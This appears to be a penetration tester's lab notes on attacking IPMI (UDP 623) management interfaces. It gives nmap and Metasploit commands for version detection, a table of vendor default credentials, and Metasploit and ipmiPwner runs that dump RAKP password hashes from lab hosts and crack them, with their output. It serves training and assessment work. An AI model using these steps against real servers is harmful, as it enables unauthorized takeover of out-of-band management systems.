IPMI (623 UDP)

Theory

Intelligent Platform Management Interface (IPMI) is a set of standardized specifications for hardware-based host management systems used for system management and monitoring. It acts as an autonomous subsystem and works independently of the host's BIOS, CPU, firmware, and underlying operating system. IPMI provides sysadmins with the ability to manage and monitor systems even if they are powered off or in an unresponsive state.

Version

sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local

msf6 > use auxiliary/scanner/ipmi/ipmi_version 
msf6 auxiliary(scanner/ipmi/ipmi_version) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_version) > show options 

Module options (auxiliary/scanner/ipmi/ipmi_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS     10.129.42.195    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      623              yes       The target port (UDP)
   THREADS    10               yes       The number of concurrent threads


msf6 auxiliary(scanner/ipmi/ipmi_version) > run

[*] Sending IPMI requests to 10.129.42.195->10.129.42.195 (1 hosts)
[+] 10.129.42.195:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0) 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Default password

Product	Username	Password
Dell iDRAC	root	calvin
HP iLO	Administrator	randomized 8-character string consisting of numbers and uppercase letters
Supermicro IPMI	ADMIN	ADMIN

Product

Username

Password

Dell iDRAC

root

calvin

HP iLO

Administrator

randomized 8-character string consisting of numbers and uppercase letters

Supermicro IPMI

ADMIN

Metasploit Wordlists

ls /opt/tools/metasploit-framework/data/wordlists/ | grep ipmi
ipmi_passwords.txt
ipmi_users.txt

Get password

Cracking IPMI Passwords Remotely

Hashes

Metasploit Dumping Hashes

msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes 
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options 

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                 Current Setting                                                    Required  Description
   ----                 ---------------                                                    --------  -----------
   CRACK_COMMON         true                                                               yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE                                                                     no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                                                        no        Save captured password hashes in john the ripper format
   PASS_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt  yes       File containing common passwords for offline cracking, one per line
   RHOSTS               10.129.42.195                                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                623                                                                yes       The target port
   THREADS              1                                                                  yes       The number of concurrent threads (max one per host)
   USER_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt      yes       File containing usernames, one per line



msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[+] 10.129.42.195:623 - IPMI - Hash found: ADMIN:8e160d4802040000205ee9253b6b8dac3052c837e23faa631260719fce740d45c3139a7dd4317b9ea123456789abcdefa123456789abcdef140541444d494e:a3e82878a09daa8ae3e6c22f9080f8337fe0ed7e
[+] 10.129.42.195:623 - IPMI - Hash for user 'ADMIN' matches password 'ADMIN'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

cat ipmi.txt
a870af384080000fcb12dffed486b2d2307f417d3261a28f099e9b1b0fe99d1f77f2b940cfba668a123456789abcdefa123456789abcdef140561646d696e:9d0c8a64d4b9cf7482ba54a9056e6b147777e025

I don't know why but hashcat didn't find the password :(

ipmiPwner

GitHub - c0rnf13ld/ipmiPwner: Exploit to dump ipmi hashesGitHub

Apr 06, 2024 - 05:26:05 (EDT) exegol-CPTS ipmiPwner # python3 ipmipwner.py --host 10.129.154.218 -u admin -c python -pW /usr/share/wordlists/rockyou.txt -oH hash -oC crackedHash


[*] Checking if port 623 for host 10.129.154.218 is active
[*] The username: admin is valid                                                  
[*] Saving hash for user: admin in file: "hash"
[*] The hash for user: admin
   \_ $rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a
[*] Starting the hash cracking with python

[*] Reading the wordlist by chunks
[*] Chunk size: 1048576
[*] Reading Bytes: 139921497/139921497                                                  
[*] Hash Cracking Started
[+] Password Found, Cracked on line: [613]
[+] The password: trinity
[+] Time elapsed: 0.00254
[+] Result saved in: crackedHash
[Apr 06, 2024 - 05:26:58 (EDT)] exegol-CPTS ipmiPwner # cat crackedHash 
$rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a:t*****y
Time elapsed: 0.00254
[Apr 06, 2024 - 05:27:19 (EDT)] exegol-CPTS ipmiPwner #

References

623/UDP/TCP - IPMIHackTricks

IPMI | Pentester's Promiscuous Notebook

PreviousIMAP POP3 (110, 143, 993, 995)NextLDAP (389)

Last updated 3 months ago